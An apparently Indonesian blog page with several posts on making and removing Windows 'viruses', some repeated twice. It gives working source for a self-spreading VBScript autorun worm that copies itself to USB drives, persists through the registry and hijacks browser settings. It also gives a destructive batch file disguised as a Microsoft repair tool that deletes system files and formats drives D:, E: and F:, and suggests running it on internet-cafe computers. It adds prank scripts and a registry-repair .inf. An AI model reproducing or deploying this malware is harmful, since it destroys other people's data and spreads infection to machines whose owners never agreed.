Jumat, 24 Februari 2012
Rabu, 11 Januari 2012
Membuat dan Menghapus Virus Autorun tanpa Antivirus
Membuat dan Menghapus Virus Autorun tanpa Antivirus
Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw. Adapun cara membuat virus autorun sebagai berikut:
1. script coding pertama[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)
2. script coding kedua
‘Kalong-X2
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd
‘siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
‘sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\k4l0n6.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set kalong = createobject(“WScript.Shell”)
‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: X2 ATTACK ::”
‘Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “KALONG-X2/1″
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “KALONG-X2″
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”
‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
‘Ubah Default Start Page Internet Explorer
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.vaksin.com”
‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)
secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.
Adapun cara menanggulangi virus tersebut yaitu dengan cara
- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK
- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut
- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
- setelah itu, file tersebut dihapus/di delete dari komputer
semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.
CARA MENGHILANGKAN VIRUS FACEBOOK
CARA MENGHILANGKAN VIRUS FACEBOOK
Repair registry yang sudah diubah oleh virus. Untuk mempercepat proses penghapusan / cara menghilangkan
virus, silahkan salin script dibawah ini pada program notepad kemudian simpan dengan nama repair.inf.
Jalankan file tersebut dengan cara: Klik kanan repair.inf, lalu pilih instal.
[Version]
Signature=”$Chicago$”
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1?”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1?” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKCU, SessionInformation, ProgramCount, 0?00010001,3
HKCU, AppEvents\Schemes\Apps\Explorer\BlockedPopup\.current,,,”C:\WINDOWS\media\Windows XP Pop-up Blocked.wav”
HKCU, AppEvents\Schemes\Apps\Explorer\EmptyRecycleBin\.Current,,,”C:\Windows\media\Windows XP Recycle.wav”
HKCU, AppEvents\Schemes\Apps\Explorer\Navigating\.Current,,,”C:\Windows\media\Windows XP Start.wav”
HKCU, AppEvents\Schemes\Apps\Explorer\SecurityBand\.current,,,”C:\WINDOWS\media\Windows XP Information Bar.wav”
[del]
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Microsoft(R) System Manager
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, bMaxUserPortWindows Service help
HKLM, SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, MaxUserPort
5. Hapus file virus berikut:
C:\vshost.exe [all drive]
C:\autorun.inf [all drive]
C:\RECYCLER\S-1-5-21-9949614401-9544371273-983011715-7040\winservices.exe
C:\Documents and Settings\%user%\Local Settings\Temp
A415.tmp [acak]
034.exe [acak]
Lady_Eats_Her_Shit–www.youtube.com
C:\WINDOWS\system32\sysmgr.exe
C:\WINDOWS\TEMP\5755.tmp
C:\windows\system32\crypts.dll
C:\windows\system32\msvcrt2.dll
6. Untuk pembersihan optimal dan mencegah infeksi ulang silahkan gunakan antivirus yang dapat mendeteksi dan menghilangkan virus ini up to date. Anda juga dapat download tools Norman Malware Cleaner di http://download.norman.no/public/Norman_Malware_Cleaner.exe
Semoga artikel cara menghilangkan virus ini bisa bermanfaat bagi anda, supaya virus yahoo messenger tidak muncul lagi di ym kita
Repair registry yang sudah diubah oleh virus. Untuk mempercepat proses penghapusan / cara menghilangkan
virus, silahkan salin script dibawah ini pada program notepad kemudian simpan dengan nama repair.inf.
Jalankan file tersebut dengan cara: Klik kanan repair.inf, lalu pilih instal.
[Version]
Signature=”$Chicago$”
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1?” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1?”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1?” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKCU, SessionInformation, ProgramCount, 0?00010001,3
HKCU, AppEvents\Schemes\Apps\Explorer\BlockedPopup\.current,,,”C:\WINDOWS\media\Windows XP Pop-up Blocked.wav”
HKCU, AppEvents\Schemes\Apps\Explorer\EmptyRecycleBin\.Current,,,”C:\Windows\media\Windows XP Recycle.wav”
HKCU, AppEvents\Schemes\Apps\Explorer\Navigating\.Current,,,”C:\Windows\media\Windows XP Start.wav”
HKCU, AppEvents\Schemes\Apps\Explorer\SecurityBand\.current,,,”C:\WINDOWS\media\Windows XP Information Bar.wav”
[del]
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Microsoft(R) System Manager
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, bMaxUserPortWindows Service help
HKLM, SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, MaxUserPort
5. Hapus file virus berikut:
C:\vshost.exe [all drive]
C:\autorun.inf [all drive]
C:\RECYCLER\S-1-5-21-9949614401-9544371273-983011715-7040\winservices.exe
C:\Documents and Settings\%user%\Local Settings\Temp
A415.tmp [acak]
034.exe [acak]
Lady_Eats_Her_Shit–www.youtube.com
C:\WINDOWS\system32\sysmgr.exe
C:\WINDOWS\TEMP\5755.tmp
C:\windows\system32\crypts.dll
C:\windows\system32\msvcrt2.dll
6. Untuk pembersihan optimal dan mencegah infeksi ulang silahkan gunakan antivirus yang dapat mendeteksi dan menghilangkan virus ini up to date. Anda juga dapat download tools Norman Malware Cleaner di http://download.norman.no/public/Norman_Malware_Cleaner.exe
Semoga artikel cara menghilangkan virus ini bisa bermanfaat bagi anda, supaya virus yahoo messenger tidak muncul lagi di ym kita
Cara Membuat Virus Mematikan
Cara Membuat Virus Mematikan
saya mempunyai beberapa virus yang ampuh , tapi kali ini saya akan memberitahu ke masyarakat virus yang paling suka , ok langsung aja ,, nih caranya :
1. Buka Notepad
2. Paste di notepad kode berikut ini
@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%% /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
pause
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
exit
3. Simpan file dengan nama yang terserah tetapi ekstensi .bat
Contoh : Virus.bat
Pastikan Save as type : all files
4. Jalankan file yang muncul setelah notepad di save. (Virus ini sangat berbahaya jika digabungkan dengan autorun).
Pastikan Kalian tidak langsung mempraktikannya di komputer kalian masing2 , coba aja dulu di Warnet T_T
saya mempunyai beberapa virus yang ampuh , tapi kali ini saya akan memberitahu ke masyarakat virus yang paling suka , ok langsung aja ,, nih caranya :
1. Buka Notepad
2. Paste di notepad kode berikut ini
@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%% /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
pause
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
exit
3. Simpan file dengan nama yang terserah tetapi ekstensi .bat
Contoh : Virus.bat
Pastikan Save as type : all files
4. Jalankan file yang muncul setelah notepad di save. (Virus ini sangat berbahaya jika digabungkan dengan autorun).
Pastikan Kalian tidak langsung mempraktikannya di komputer kalian masing2 , coba aja dulu di Warnet T_T
Cara membuat virus nakal dengan notepad
Cara membuat virus nakal dengan notepad
Cara membuat virus nakal dengan aplikasi notepad, dengan aplikasi sederhana ini kita bisa membuat hal2 yang menyenangkan untuk sekedar “menjahili” (lebih baik menjahili dari pada merusak pc/laptop) sobat kita bahkan dengan aplikasi sederhana ini, kita bisa membuat sebuah program yang merugikan seperti sebuah virus. Tapi saya tak ingin anda berbuat begitu, disini saya hanya akan memberikan beberapa script “jahil” sederhana untuk sekedar bersenang-senang dengan aplikasi ini. Berikut ini beberapa script sederhana yang mungkin bisa anda coba2 saat bermain notepad, notepad sudah ada di pc masing2, letaknya di start->all programs->aksesoris->notepad:
Cara membuat virus nakal dengan aplikasi notepad, dengan aplikasi sederhana ini kita bisa membuat hal2 yang menyenangkan untuk sekedar “menjahili” (lebih baik menjahili dari pada merusak pc/laptop) sobat kita bahkan dengan aplikasi sederhana ini, kita bisa membuat sebuah program yang merugikan seperti sebuah virus. Tapi saya tak ingin anda berbuat begitu, disini saya hanya akan memberikan beberapa script “jahil” sederhana untuk sekedar bersenang-senang dengan aplikasi ini. Berikut ini beberapa script sederhana yang mungkin bisa anda coba2 saat bermain notepad, notepad sudah ada di pc masing2, letaknya di start->all programs->aksesoris->notepad:
1. Membuka dan menutup CD/ DVD Komputer Copy script dibawah ini dan paste di notepad anda. Set oWMP = CreateObject (“WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Simpan dengan format *.vbs. Lalu Buka File Tersebut
2. Menulis otomatis di notepad Copy script dibawah ini dan paste di notepad anda. Set wshShell = wscript.CreateObject (“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “Tulisan ini akan menulis sendiri di notepad anda” loop Simpan dengan format *.vbs. Lalu Buka File Tersebut
3. Membuat Pesan muncul berulang – ulang Copy script dibawah ini dan paste di notepad anda. @ECHO off :Begin msg hahahhaa msg santai boss msg ini hanya main-main msg jangan marah ya msg hanya bercanda GOTO BEGIN Simpan dengan format .bat. Lalu Buka File Tersebut
4. Membuat Komputer Shutdown dengan muncul pesan. Copy script dibawah ini dan paste di notepad anda. @echo off msg Hahahahhaha shutdown -s -c “Komputer anda mati” Simpan dengan format .bat. Lalu Buka File Tersebut
5. Membuat Tombol Capslock terus menyala Copy script dibawah ini dan paste di notepad anda. Set wshShell =wscript.CreateObject (“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop Simpan dengan format *.vbs. Lalu Buka File Tersebut
6. Membuat terus – menerus menekan tombol “backspace” Copy script dibawah ini dan paste di notepad anda. MsgBox “Kembali ke menu sebelumnya” Set wshShell =wscript.CreateObject (“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop Simpan dengan format *.vbs. Lalu Buka File Tersebut
7. Membuka notepad Terus – menerus Copy script dibawah ini dan paste di notepad anda. @ECHO off :top START %SystemRoot% \system32\notepad.exe GOTO top Simpan dengan format *.bat. Lalu Buka File Tersebut
Langganan:
Postingan (Atom)